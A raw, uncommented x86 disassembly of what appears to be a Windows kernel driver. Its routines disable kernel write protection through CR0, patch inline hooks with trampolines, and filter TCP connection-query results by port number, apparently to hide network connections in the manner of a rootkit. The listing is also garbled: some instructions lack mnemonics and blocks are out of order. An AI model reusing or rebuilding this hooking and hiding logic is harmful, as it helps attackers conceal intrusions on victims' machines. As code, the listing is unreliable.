cmp ecx [ ebp - 0x70 ]
jne 0x1166f
mov ecx [ ebx + 0x38 ]
mov esi [ ebp - 0x68 ]
imul ecx ecx 0x38
lea esi [ ecx + esi - 0x38 ]
push 0xe
pop ecx
[ edi ] [ esi ]
mov ecx [ ebx + 0x38 ]
mov edi [ ebp - 0x58 ]
imul ecx ecx 0xc
lea esi [ ecx + eax - 0xc ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
mov ecx [ ebx + 0x38 ]
mov edi [ ebp - 0x60 ]
shl ecx 0x5
lea esi [ ecx + edx - 0x20 ]
push 0x8
pop ecx
[ edi ] [ esi ]
mov ecx [ ebx + 0x38 ]
mov esi [ ebp - 0x68 ]
imul ecx ecx 0x38
lea edi [ ecx + esi - 0x38 ]
push 0xe
pop ecx
lea esi [ ebp - 0x54 ]
[ edi ] [ esi ]
mov ecx [ ebx + 0x38 ]
imul ecx ecx 0xc
sub [ ebp - 0x64 ] 0x38
sub [ ebp - 0x58 ] 0xc
sub [ ebp - 0x60 ] 0x20
lea edi [ ecx + eax - 0xc ]
lea esi [ ebp - 0x10 ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
mov ecx [ ebx + 0x38 ]
shl ecx 0x5
dec [ ebp - 0x5c ]
lea edi [ ecx + edx - 0x20 ]
push 0x8
pop ecx
lea esi [ ebp - 0x90 ]
[ edi ] [ esi ]
dec [ ebx + 0x38 ]
mov eax [ ebp - 0x60 ]
push 0x14
xor edx edx
pop esi
div esi
inc [ ebp - 0x58 ]
add edi 0x14
mov [ ebp - 0x5c ] edi
cmp [ ebp - 0x58 ] eax
jb 0x11509
mov edx [ ebp - 0x6c ]
cmp edx [ edi + 0xc ]
jne 0x11556
mov edi ebx
mov [ ebp - 0x5c ] ebx
mov eax edx
xor edx edx
mov edi 0xa8
div edi
cmp edx esi
jne 0x1156e
movzx edx [ edi + 0x10 ]
movzx esi [ edi + 0x11 ]
shl edx 0x8
add edx esi
cmp ecx edx
jne 0x11556
and [ ebp - 0x18 ] 0x0
sub [ ebp - 0x5c ] 0x14
sub [ ebp - 0x60 ] 0x14
mov ecx eax
imul ecx ecx 0x14
dec [ ebp - 0x58 ]
lea edx [ ecx + ebx - 0x14 ]
push 0x5
pop ecx
mov esi edx
[ edi ] [ esi ]
push 0x5
pop ecx
lea esi [ ebp - 0x18 ]
mov edi edx
[ edi ] [ esi ]
cmp eax 0x1
jbe 0x1156e
mov eax [ ebp - 0x60 ]
push 0x18
xor edx edx
pop esi
div esi
inc [ ebp - 0x58 ]
add edi 0x18
mov [ ebp - 0x5c ] edi
cmp [ ebp - 0x58 ] eax
jb 0x11489
mov edx [ ebp - 0x6c ]
cmp edx [ edi + 0xc ]
jne 0x114da
mov [ ebp - 0x58 ] esi
cmp eax esi
jbe 0x1156e
mov ecx [ ebp - 0x64 ]
mov edi [ ebp - 0x5c ]
movzx edx [ edi + 0x10 ]
movzx esi [ edi + 0x11 ]
shl edx 0x8
add edx esi
cmp ecx edx
jne 0x114da
jmp 0x1156e
and [ ebp - 0x1c ] 0x0
sub [ ebp - 0x5c ] 0x18
sub [ ebp - 0x60 ] 0x18
mov ecx eax
imul ecx ecx 0x18
dec [ ebp - 0x58 ]
lea edx [ ecx + ebx - 0x18 ]
push 0x6
pop ecx
mov esi edx
[ edi ] [ esi ]
push 0x6
pop ecx
lea esi [ ebp - 0x1c ]
mov edi edx
[ edi ] [ esi ]
cmp eax 0x1
jbe 0x1156e
mov edi ebx
mov [ ebp - 0x5c ] ebx
mov ecx [ ebp - 0x64 ]
mov edi [ ebp - 0x5c ]
mov eax [ ebp - 0x60 ]
xor edx edx
mov esi 0xa8
div esi
inc [ ebp - 0x58 ]
add edi 0xa8
mov [ ebp - 0x5c ] edi
cmp [ ebp - 0x58 ] eax
jb 0x113ee
mov edx [ ebp - 0x6c ]
cmp edx [ edi + 0x10 ]
jne 0x1144e
movzx edx [ edi + 0x14 ]
movzx esi [ edi + 0x15 ]
shl edx 0x8
add edx esi
cmp ecx edx
jne 0x1144e
jmp 0x1156e
and [ ebp - 0x134 ] 0x0
mov ecx eax
imul ecx ecx 0xa8
dec [ ebp - 0x58 ]
lea edx [ ecx + ebx - 0xa8 ]
push 0x2a
pop ecx
mov esi edx
[ edi ] [ esi ]
push 0x2a
pop ecx
lea esi [ ebp - 0x138 ]
mov edi edx
[ edi ] [ esi ]
mov ecx 0xa8
sub [ ebp - 0x5c ] ecx
sub [ ebp - 0x60 ] ecx
cmp eax 0x1
jb 0x1156e
mov ecx [ ebp - 0x64 ]
mov edi [ ebp - 0x5c ]
sub_116a6
mov edi edi
push ebp
mov ebp esp
push ebx
xor bl bl
cmp [ ebp + 0x8 ] 0x120003
jne 0x116f6
mov al bl
pop ebx
pop ebp
retn 0xc
push esi
mov esi [ ebp + 0xc ]
test esi esi
je 0x116f5
pop esi
cmp [ ebp + 0x10 ] 0x24
jne 0x116f5
push esi
call [ 0x12040 ]
test al al
je 0x116f5
cmp [ esi ] 0x400
jne 0x116f5
mov esi [ esi + 0x10 ]
cmp esi 0x101
je 0x116f3
mov bl 0x1
cmp esi 0x102
je 0x116f3
cmp esi 0x110
jne 0x116f5
sub_11702
mov edi edi
push ebp
mov ebp esp
push ebx
xor bl bl
cmp [ ebp + 0x8 ] 0x12001b
jne 0x11760
mov al bl
pop ebx
pop ebp
retn 0xc
push esi
mov esi [ ebp + 0xc ]
test esi esi
je 0x1175f
pop esi
cmp [ ebp + 0x10 ] 0x3c
jne 0x1175f
push edi
mov edi [ 0x12040 ]
push esi
call edi
test al al
je 0x1175e
pop edi
cmp [ esi + 0x1c ] 0x38
jne 0x1175e
cmp [ esi + 0x2c ] 0xc
jne 0x1175e
cmp [ esi + 0x34 ] 0x20
jne 0x1175e
push [ esi + 0x18 ]
call edi
test al al
je 0x1175e
push [ esi + 0x28 ]
call edi
test al al
je 0x1175e
push [ esi + 0x30 ]
call edi
test al al
je 0x1175e
inc bl
sub_1178e
mov edi edi
push ebp
mov ebp esp
mov eax [ ebp + 0x8 ]
test eax eax
je 0x117b0
xor al al
cmp [ ebp + 0xc ] 0x6
jb 0x117b0
movzx ecx [ eax + 0x4 ]
push ecx
push [ eax ]
call 0x1176c
mov al 0x1
jmp 0x117b2
pop ebp
retn 0x8
sub_117bc
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
push edi
lea eax [ ebp - 0x8 ]
push eax
xor edi edi
push edi
push edi
push 0xb
mov [ ebp - 0x8 ] edi
mov [ ebp - 0x1 ] 0x0
call 0x11f58
cmp eax 0xc0000004
je 0x117e8
push ebx
mov ebx [ ebp - 0x8 ]
push esi
cmp ebx edi
ja 0x117f6
xor al al
jmp 0x11896
push 0x70737049
push ebx
push edi
call [ 0x12048 ]
mov esi eax
cmp esi edi
je 0x11891
mov ebx 0x1000
pop edi
leave
retn 0xc
mov al [ ebp - 0x1 ]
pop esi
pop ebx
lea eax [ ebp - 0x8 ]
push eax
push ebx
push esi
push 0xb
call 0x11f58
test eax eax
jl 0x11889
push edi
push esi
call [ 0x12044 ]
cmp [ ebp + 0x8 ] edi
jne 0x11830
cmp [ esi ] edi
jbe 0x11889
mov eax [ esi + 0xc ]
mov ecx [ ebp + 0xc ]
mov [ ecx ] eax
mov eax [ esi + 0x10 ]
jmp 0x11880
lea ebx [ esi + 0x20 ]
mov ecx [ ebp + 0x10 ]
mov [ ebp - 0x1 ] 0x1
mov [ ecx ] eax
mov eax ebx
inc eax
jmp 0x1184b
mov edx [ ebp + 0xc ]
imul edi edi 0x11c
lea eax [ edi + esi ]
mov ecx [ eax + 0xc ]
mov [ edx ] ecx
mov eax [ eax + 0x10 ]
xor edi edi
inc edi
add ebx 0x11c
cmp edi [ esi ]
jb 0x11837
push [ ebp + 0x8 ]
push eax
call [ 0x1206c ]
pop ecx
pop ecx
test eax eax
je 0x1186a
push 0x5c
push ebx
call [ 0x12070 ]
pop ecx
pop ecx
test eax eax
je 0x11849
xor edi edi
jmp 0x11889
sub_118a0
mov edi edi
push ebp
mov ebp esp
mov eax [ 0x12024 ]
movzx ecx [ eax ]
push ebx
push esi
xor eax eax
push edi
cmp ecx 0xa28
je 0x118c2
cmp [ ebp + 0xc ] eax
je 0x11906
cmp ecx 0xece
jne 0x118fd
xor ebx ebx
cmp eax ebx
je 0x118fb
xor ecx ecx
cmp ecx 0x120f4
je 0x11906
pop edi
pop esi
pop ebx
pop ebp
retn 0x8
xor eax eax
mov eax [ eax - 0x4 ]
mov [ 0x1223e ] eax
cmp [ ebp + 0xc ] ebx
je 0x118fb
mov edx [ ebp + 0x8 ]
xor ebx ebx
cmp [ ebp + 0xc ] eax
jbe 0x118fb
xor eax eax
cmp eax 0x1223c
je 0x118fb
push 0x5
pop ecx
mov edi 0x120f4
mov esi edx
xor eax eax
[ esi ] [ edi ]
je 0x118f0
mov edx [ ebp + 0x8 ]
cmp [ ebp + 0xc ] eax
jbe 0x118fb
test eax eax
je 0x11904
sbb eax eax
sbb eax 0xffffffff
push 0x6
pop ecx
mov edi 0x1223c
mov esi edx
xor eax eax
[ esi ] [ edi ]
je 0x1193f
mov eax edx
inc edx
inc ebx
cmp ebx [ ebp + 0xc ]
jb 0x118db
test eax eax
je 0x1194c
sbb eax eax
sbb eax 0xffffffff
mov eax edx
jmp 0x118fd
inc edx
inc ebx
cmp ebx [ ebp + 0xc ]
jb 0x1192a
jmp 0x118fb
sub_11956
mov edi edi
push ebp
mov ebp esp
push esi
mov esi [ ebp + 0x8 ]
push [ esi + 0x10 ]
call 0x11ec6
test al al
jne 0x11977
mov al 0x1
push [ esi + 0xc ]
call 0x11ec6
test al al
je 0x11979
pop esi
pop ebp
retn 0x4
sub_11984
mov edi edi
push ebp
mov ebp esp
push esi
mov esi [ ebp + 0x8 ]
mov eax [ esi + 0x8 ]
push [ eax + 0x8 ]
call 0x11956
xor ecx ecx
test al al
sete cl
mov [ esi + 0x1c ] ecx
pop esi
pop ebp
retn
sub_119aa
mov edi edi
push ebp
mov ebp esp
push ecx
push ecx
mov al [ 0x12aa8 ]
and [ ebp - 0x8 ] 0x0
and [ ebp - 0x4 ] 0x0
push ebx
xor bl bl
test al al
je 0x119c9
mov eax [ 0x12024 ]
movzx eax [ eax ]
cmp eax 0xece
ja 0x11a17
mov bl al
jmp 0x11a17
mov al bl
pop ebx
leave
retn
lea eax [ ebp - 0x4 ]
push eax
lea eax [ ebp - 0x8 ]
push eax
push 0x11fa4
call 0x117bc
mov bl al
test bl bl
je 0x11a17
push [ ebp - 0x4 ]
push [ ebp - 0x8 ]
call 0x118a0
mov [ 0x12aac ] eax
test eax eax
je 0x11a17
push 0x11984
push eax
call 0x11b82
mov bl al
mov [ 0x12aa8 ] bl
sub_11a22
pushad
mov esi [ esp + 0x24 ]
mov ecx [ esp + 0x28 ]
xor edx edx
xor eax eax
and dl 0xf7
mov al [ ecx ]
inc ecx
or edx [ esi + eax * 4 ]
test dl 0x8
jne 0x11a2f
cmp al 0xf6
je 0x11a77
or dh 0x40
test [ ecx ] 0x38
jne 0x11a4d
cmp al 0xf7
je 0x11a77
test dh 0x80
jne 0x11aa4
or dh 0x80
jmp 0x11a4d
cmp al 0xcd
je 0x11a84
xor dh 0x20
test al 0x1
jne 0x11a52
test dh 0x40
jne 0x11aca
or dh 0x1
cmp [ ecx ] 0x20
jne 0x11a4d
cmp al 0xf
je 0x11a91
xor dh 0x21
jmp 0x11a52
mov al [ ecx ]
inc ecx
mov ah al
and ax 0xc007
cmp ah 0xc0
je 0x11a57
test dl 0x20
jne 0x11ab0
or dh 0x4
jmp 0x11a4d
mov al [ ecx ]
inc ecx
or edx [ esi + eax * 4 + 0x400 ]
cmp edx 0xffffffff
jne 0x11a4d
test dl 0x10
jne 0x11b0e
xor dl 0x2
test dl 0x10
jne 0x11a5c
test dh 0x20
jne 0x11abd
mov eax edx
jmp 0x11a71
cmp ax 0x6
je 0x11b22
cmp al 0x4
jne 0x11aea
xor dl 0x6
jmp 0x11a5c
xor dh 0x2
test dh 0x10
jne 0x11a61
mov eax ecx
sub eax [ esp + 0x28 ]
and edx 0x707
add al dl
add al dh
mov [ esp + 0x1c ] eax
popad
retn
or dl 0x2
jmp 0x11a57
cmp ah 0x40
je 0x11b06
cmp ah 0x40
je 0x11b06
mov al [ ecx ]
inc ecx
and al 0x7
xor dh 0x6
jmp 0x11a61
or dl 0x1
jmp 0x11a57
cmp ah 0x80
jne 0x11a57
cmp ah 0x80
je 0x11afe
or dl 0x4
jmp 0x11a57
cmp ax 0x5
jne 0x11a57
sub_11b4e
mov edi edi
push ebp
mov ebp esp
push esi
push [ ebp + 0x8 ]
call 0x11b30
mov esi eax
cmp eax [ ebp + 0xc ]
jae 0x11b75
mov eax esi
pop esi
pop ebp
retn 0x8
add [ ebp + 0x8 ] eax
push [ ebp + 0x8 ]
call 0x11b30
add esi eax
cmp esi [ ebp + 0xc ]
jb 0x11b63
sub_11b82
mov edi edi
push ebp
mov ebp esp
sub esp 0xc
push esi
mov esi [ 0x12040 ]
push edi
push [ ebp + 0x8 ]
xor eax eax
and [ ebp - 0x4 ] eax
lea edi [ ebp - 0xb ]
mov [ ebp - 0xc ] 0x0
stosd [ edi ]
call esi
test al al
je 0x11cce
xor al al
mov edi [ ebp + 0xc ]
push edi
call esi
test al al
je 0x11cce
push ebx
push 0x5
push [ ebp + 0x8 ]
call 0x11b4e
push 0x11fae
push 0x2a
push 0x0
mov ebx eax
call [ 0x12048 ]
mov esi eax
sub eax [ ebp + 0x8 ]
sub edi esi
sub eax 0x5
mov [ ebp - 0xb ] eax
sub edi 0xd
mov [ esi + 0x9 ] edi
mov [ esi ] 0x60
mov [ esi + 0x1 ] 0x9c
mov [ esi + 0x2 ] 0xc083c48b
mov eax 0x5004
mov [ esi + 0x6 ] ax
mov [ esi + 0x8 ] 0xe8
mov [ esi + 0xd ] 0x58
mov [ esi + 0xe ] 0x9d
mov [ esi + 0xf ] 0x61
lea ecx [ esi + 0x10 ]
mov edi ecx
mov eax 0x90909090
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
push ebx
push [ ebp + 0x8 ]
stosd [ edi ]
push ecx
mov [ ebp - 0xc ] 0xe9
stosd [ edi ]
call 0x11f4c
mov [ ebp + 0xc ] 0x74
mov [ ebp + 0xd ] 0x2
mov [ ebp + 0xe ] 0x3b
mov [ ebp + 0xf ] 0xc7
mov eax [ ebp + 0xc ]
add esp 0xc
mov [ ebx + esi + 0x10 ] eax
mov ecx [ ebp + 0x8 ]
lea eax [ ebx + ecx ]
mov [ esi + 0x24 ] 0x68
mov [ esi + 0x25 ] eax
mov [ esi + 0x29 ] 0xc3
cli
mov eax cr0
and eax 0xfffeffff
mov cr0 eax
mov edi ecx
lea esi [ ebp - 0xc ]
add ebx 0xfffffffb
movsd [ edi ] [ esi ]
push ebx
add ecx 0x5
push 0x90
push ecx
movsb [ edi ] [ esi ]
call 0x11f40
add esp 0xc
mov eax cr0
or eax 0x10000
mov cr0 eax
sti
mov al 0x1
pop ebx
jmp 0x11cd0
push edi
call 0x11b30
cmp eax 0x5
jne 0x11c7b
pop edi
pop esi
leave
retn 0x8
add [ ebp - 0x4 ] eax
cmp [ ebp - 0x4 ] 0x14
jb 0x11c47
mov cl [ edi ]
cmp cl 0xe8
je 0x11c6a
mov eax [ ebp - 0x4 ]
lea edi [ esi + eax + 0x10 ]
cmp [ edi ] 0x90
je 0x11c84
mov edx [ ebp + 0x8 ]
mov ecx [ ebp - 0x4 ]
sub edx esi
lea ecx [ ecx + esi + 0x11 ]
sub edx 0x10
add [ ecx ] edx
cmp cl 0xe9
jne 0x11c7b
sub_11cdc
cmp [ 0x12ae7 ] 0x0
jne 0x11d1a
retn
push 0x37
push 0x0
push 0x12ab0
call 0x11f40
add esp 0xc
cmp [ 0x12b08 ] 0x0
jne 0x11d13
mov [ 0x12ae7 ] 0x1
push 0x0
push 0x12ae8
call [ 0x12078 ]
mov [ 0x12b08 ] 0x1
sub_11d48
mov edi edi
push ebp
mov ebp esp
push ebx
push esi
mov esi [ ebp + 0x8 ]
xor ebx ebx
cmp esi ebx
jne 0x11d5f
push edi
push ebx
push ebx
push ebx
push ebx
push 0x12ae8
mov [ ebp + 0xb ] bl
call [ 0x12080 ]
mov eax [ esi + 0x5 ]
xor edi edi
xor ecx ecx
xor al al
jmp 0x11e28
mov cl [ esi + 0x4 ]
cmp cl bl
je 0x11dbc
add ecx 0xb
inc edi
cmp ecx 0x37
jb 0x11d79
pop esi
pop ebx
pop ebp
retn 0x4
imul edi edi 0xb
xor eax eax
add edi 0x12ab0
stosd [ edi ]
stosd [ edi ]
stosw [ edi ]
stosb [ edi ]
mov eax edi
imul eax eax 0xb
mov [ eax + 0x12ab4 ] cl
mov ecx [ esi + 0x5 ]
mov [ eax + 0x12ab5 ] ecx
mov cx [ esi + 0x9 ]
mov [ eax + 0x12ab9 ] cx
mov ecx [ esi ]
mov [ eax + 0x12ab0 ] ecx
jmp 0x11dcc
cmp [ ecx + 0x12ab5 ] eax
je 0x11d8c
jmp 0x11dd0
push ebx
push 0x12ae8
call [ 0x1207c ]
mov al [ ebp + 0xb ]
cmp [ ecx + 0x12ab5 ] ebx
je 0x11ded
mov [ ebp + 0xb ] 0x1
xor eax eax
xor ecx ecx
pop edi
mov cl [ esi + 0x4 ]
imul eax eax 0xb
mov [ eax + 0x12ab4 ] cl
mov ecx [ esi + 0x5 ]
mov [ eax + 0x12ab5 ] ecx
mov cx [ esi + 0x9 ]
mov [ eax + 0x12ab9 ] cx
mov ecx [ esi ]
mov [ eax + 0x12ab0 ] ecx
mov [ ebp + 0xb ] 0x1
add ecx 0xb
inc eax
cmp ecx 0x37
jb 0x11dd5
cmp [ ebp + 0xb ] bl
jne 0x11e19
jmp 0x11e19
sub_11e34
mov edi edi
push ebp
mov ebp esp
push esi
mov esi [ ebp + 0x8 ]
push edi
xor edi edi
cmp esi edi
jne 0x11e48
cmp [ esi + 0x4 ] 0x0
jne 0x11e44
xor al al
jmp 0x11ebb
push ebx
push edi
push edi
push edi
push edi
mov ebx 0x12ae8
push ebx
mov [ ebp + 0xb ] 0x0
call [ 0x12080 ]
mov esi [ esi + 0x5 ]
cmp esi edi
jne 0x11e80
pop edi
pop esi
pop ebp
retn 0x4
xor ecx ecx
xor eax eax
push 0x37
push edi
push 0x12ab0
mov [ ebp + 0xb ] 0x1
call 0x11f40
add esp 0xc
jmp 0x11eaf
mov edi ecx
imul edi edi 0xb
add edi 0x12ab0
xor eax eax
stosd [ edi ]
stosd [ edi ]
stosw [ edi ]
stosb [ edi ]
mov [ ebp + 0xb ] 0x1
xor edi edi
add eax 0xb
inc ecx
cmp eax 0x37
jb 0x11e84
push edi
push ebx
call [ 0x1207c ]
mov al [ ebp + 0xb ]
pop ebx
cmp [ eax + 0x12ab5 ] esi
je 0x11e97
jmp 0x11eaf
sub_11ec6
mov edi edi
push ebp
mov ebp esp
mov edx [ ebp + 0x8 ]
xor eax eax
cmp edx eax
jne 0x11ed8
xor ecx ecx
xor al al
jmp 0x11ef6
add ecx 0xb
cmp ecx 0x37
jb 0x11eda
cmp [ ecx + 0x12ab4 ] al
jne 0x11ef4
pop ebp
retn 0x4
cmp [ ecx + 0x12ab5 ] edx
jne 0x11eea
jmp 0x11ef6
mov al 0x1
sub_12b85
mov eax [ 0x12a60 ]
mov ecx 0xbb40e64e
test eax eax
je 0x12b97
mov eax [ 0x1208c ]
mov eax [ eax ]
xor eax 0x12a60
mov [ 0x12a60 ] eax
jne 0x12bb1
cmp eax ecx
jne 0x12bb1
not eax
mov [ 0x12a64 ] eax
retn
mov eax ecx
mov [ 0x12a60 ] eax
sub_1176c
mov edi edi
push ebp
mov ebp esp
mov eax [ ebp + 0x8 ]
mov ecx 0x12aa0
xchg [ ecx ] eax
mov eax [ ebp + 0xc ]
mov ecx 0x12aa4
xchg [ ecx ] eax
pop ebp
retn 0x8
sub_11b2a
retn
sub_11b30
mov edi edi
push ebp
mov ebp esp
push [ ebp + 0x8 ]
push 0x12248
call 0x11a22
add esp 0x8
pop ebp
retn 0x4
sub_11d20
cmp [ 0x12ae7 ] 0x0
je 0x11d41
retn
push 0x37
push 0x0
push 0x12ab0
call 0x11f40
add esp 0xc
mov [ 0x12ae7 ] 0x0
sub_11eff
cmp ecx [ 0x12a60 ]
jne 0x11f0a
jmp 0x11f14
retn 0x0
sub_11f14
mov edi edi
push ebp
mov ebp esp
push ecx
mov [ ebp - 0x4 ] ecx
push 0x0
push [ 0x12a64 ]
push [ 0x12a60 ]
push [ ebp - 0x4 ]
push 0xf7
call [ 0x12084 ]
int3
memset
jmp [ 0x1200c ]
memcpy
jmp [ 0x12068 ]
ZwQuerySystemInformation
jmp [ 0x12074 ]
_start
mov edi edi
push ebp
mov ebp esp
call 0x12b85
pop ebp
jmp 0x10516
